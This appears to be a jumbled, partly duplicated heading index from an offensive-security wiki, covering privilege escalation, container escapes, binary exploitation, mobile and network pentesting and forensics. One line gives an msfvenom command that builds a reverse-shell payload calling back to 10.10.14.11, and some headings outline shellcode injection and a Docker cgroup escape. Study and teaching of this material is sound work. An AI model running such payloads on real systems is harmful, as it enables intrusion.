Cyber Library Database

Edouard

SMTP

WWHW (Technical Explanations)

WWHW (Exploitation/Patch)

Pwn template

Pwn scrable

Pwn pwnstrip

Pwn phd

Pwn phd

Pwn hex

Pwn elfdiff

Pwn disasm

Pwn disablenx

Pwn debug

Pwn cyclic

Pwn constgrep

FreeIPA Pentesting

Splunk LPE and Persistence

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=9001 -f py -o revshell.py

Detach from the process.

Set the registers

Modify the instruction pointer

Inject the shellcode into the running process byte by byte.

Linux Capabilities

Linux Active Directory

Interesting Groups - Linux Privesc

lxd/lxc Group - Privilege escalation

Arbitrary File Write to Root

D-Bus Enumeration & Command Injection Privilege Escalation

SELinux Users

SELinux in Containers

Linux Privilege Escalation

ld.so privesc exploit example

RunC Privilege Escalation

euid, ruid, suid

Cisco - vmanage

Privilege Escalation

RCE example from debug console

Node inspector/CEF debug abuse

Weaponizing Distroless

Docker release_agent cgroups escape

Get a shell as augustus inside the container

Create the non-priv user of the host inside the container

Brute force the host PID until the output path is created, or we run out of guesses

Set up the cgroup mount using the memory resource cgroup controller

Prepare the payload script to execute on the host

Executes the attack by spawning a process that immediately ends inside the 'x' child cgroup

Sets release_agent to /path/payload

Enables cgroup notifications on release of the 'x' cgroup

Mounts the RDMA cgroup controller and create a child cgroup

Finds path of OverlayFS mount for container

Enables notify_on_release in the cgroup

Attempt to Mount the Host's Filesystem

Check Underlying Host Filesystem

Docker Breakout / Privilege Escalation

Sensitive Mounts

Seccomp

User Namespace

IPC Namespace

PID Namespace

Network Namespace

CGroup Namespace

UTS Namespace

Namespaces

Time Namespace

Docker SecurityMount Namespace

Docker --privileged

Docker Auth Plugin Bypass

Disable special builtins chars so you can abuse them as scripts

Get environment variables

AppArmor

Containerd (ctr) Privilege Escalation

A regex that only allows letters and numbers might be vulnerable to new line characters

Get environment variables

Read file with read

Bypass FS protections: read-only / no-exec / Distroless

Linux Post-Exploitation

Bypass Linux Restrictions

Find SGID set files

Extract IDs

List files inside zip

ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys

Format Strings - Arbitrary Read Example

Format Strings

64-bit

ASLR

CET & Shadow Stack

Memory Tagging Extension (MTE)

BF Addresses in the Stack

Common Binary Exploitation Protections & Bypasses

Relro

No-exec / NX

Print Stack Canary

Brute force the canary

BF Forked & Threaded Stack Canaries

Stack Canaries

BROP - Blind Return Oriented Programming

SROP - ARM64

SROP - Sigreturn-Oriented Programming

Establish our ROP Gadgets

Leaking libc address with ROP

Leaking libc - template

Disable ASLR

Ret2lib + Printf leak - arm64

One Gadget

Integer Overflow

Pointer Redirecting

Stack Shellcode

Stack Shellcode - arm64

Stack Pivoting - EBP2Ret - EBP chaining

Stack Overflow

Uninitialized Variables

Common Exploiting Problems

ELF Basic Information

Basic Binary Exploitation Methodology

PwnTools

Exploiting Tools

Android Forensics

Xamarin Apps

iOS Testing Environment

iOS Frida Configuration

iOS App Extensions

iOS UIActivity Sharing

Basic Hooking

Basic Enumeration of the app

iOS Universal Links

iOS Pentesting

Data Protection

Privilege Separation and Sandbox

iOS Burp Suite Configuration

iOS WebViews

Cordova Apps

Install Burp Certificate

Android Task Hijacking

Reversing Native Libraries

AVD - Android Virtual Device

Tapjacking

Smali - Decompiling/Modifying/Compiling

Exploiting Content Providers

Bypassing root and debuggeable checks

Exploiting a debuggeable application

Webview Attacks

Android Applications Pentesting

Android Applications Basics

APK decompilers

Bypass Biometric Authentication (Android)

CBC - Cipher Block Chaining

Esoteric languages

Stego Tricks

Launch Attack

Generate Certificates

Pentesting Wifi

Evil Twin EAP-TLS

IPv6 Basic theory

Nmap Summary (ESP)

Spoofing SSDP and UPnP Devices with EvilSSDP

Proxychains for routing traffic

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Lateral VLAN Segmentation Bypass

Fake wifi

Bettercap

Pentesting Network

Uncommon IP and TCP options

Adjust routing

Configure secondary IP and SNAT

Enable promiscuous mode and IP forwarding

GLBP & HSRP Attacks

EIGRP Attacks

subdomains + port scan + web screenshots

/etc/crontab

External Recon Methodology

Wide Source Code Search

Github Dorks & Leaks

msfconsole

legba ScyllaDB / Apache Casandra

Brute Force - CheatSheet

Interactive shell accessBidirectional file transfer

Shells - Windows (windows.md)

Shells - Linux (linux.md)

Interesting Windows Registry Keys

Windows Artifacts

Memory dump analysis

Malware Analysis

Image Acquisition & Mount

Anti-Forensic Techniques

Wifi Pcap Analysis

Filter by regex

ICMP type & Code

CentOS

Debian

Ubuntu

String based drop

Block IP addresses & ports

Suricata & Iptables cheatsheet

Pcap Inspection

Wireshark tricks

Basic Forensic Methodology

Docker Forensics

Baseline

Find executable files

Identifying non-package executables (RedHat)

Identifying non-package executables (Debian)

RedHat RPM database query

Linux Forensics

Browser Artifacts

PDF File analysis

Local Cloud Storage

File/Data Carving & Recovery Tools

macOS BundlesPyscript

macOS Universal binaries & Mach-O Format

macOS Memory Dumping

macOS Security & Privilege Escalation

macOS Privilege Escalation

macOS TCC Payloads

macOS TCC Bypasses

macOS Apple Scripts

macOS TCC

macOS Security Protections

macOS Gatekeeper / Quarantine / XProtect

macOS SIP

macOS xattr-acls extra stuff

macOS GCD - Grand Central Dispatch

macOS Chromium Injection

macOS Office Sandbox Bypasses

macOS Default Sandbox Debug

Binary sandbox profile

Set breakpoint in xpc_pipe_routine

Create a certificate for 'Code Signing'

Disable GateKeeper

Introduction to ARM64v8

smbutil (using pcap capture)

macOS Apps - Inspecting, debugging and Fuzzing

macOS File Extension & URL scheme app handlers

macOS Bypassing Firewalls

macOS XPC Authorization

macOS PID Reuse

macOS xpc_connection_get_audit_token Attack

macOS XPC Connecting Process Check

macOS MIG - Mach Interface Generator

macOS XPC

macOS IPC - Inter Process Communication

macOS .Net Applications Injection

macOS Dirty NIB

macOS Ruby Applications Injection

Intercept traffic

macOS Proces Abuse

macOS Function Hooking

macOS Python Applications Injection

Check if an app has vulenrable fuses vulenrable

macOS Java Applications Injection

macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES

macOS Library Injection

macOS Useful Commands

Apply CS_RESTRICT protection

Windows Exploiting (Basic Guide - OSCP lvl)

Pwn asm

Vulns detection

Wildcards Spare tricks

SSH Forward Agent exploitation

Splunk LPE and Persistence

Socket Command Injection

SELinux

RunC Privilege Escalation

Payloads to execute

Node inspector/CEF debug abuse

NFS no_root_squash/no_all_squash misconfiguration PE

Linux Capabilities

Linux Active Directory

ld.so privesc exploit example

Logstash

lxd/lxc Group - Privilege escalation

Interesting Groups - Linux Privesc

euid, ruid, suid

Escaping from Jails

Weaponizing Distroless

Seccomp

UTS Namespace

User Namespace

Time Namespace

Network Namespace

Mount Namespace

PID Namespace

IPC Namespace

CGroup Namespace

Namespaces

Sensitive Mounts

Docker release_agent cgroups escape

release_agent exploit - Relative Paths to PIDs

Docker Breakout / Privilege Escalation

Docker --privileged

CGroups

AuthZ& AuthN - Docker Access Authorization Plugin

AppArmor

Abusing Docker Socket for Privilege Escalation

Docker Security

D-Bus Enumeration & Command Injection Privilege Escalation

Containerd (ctr) Privilege Escalation

Cisco - vmanage

Arbitrary File Write to Root

Windows WmicExec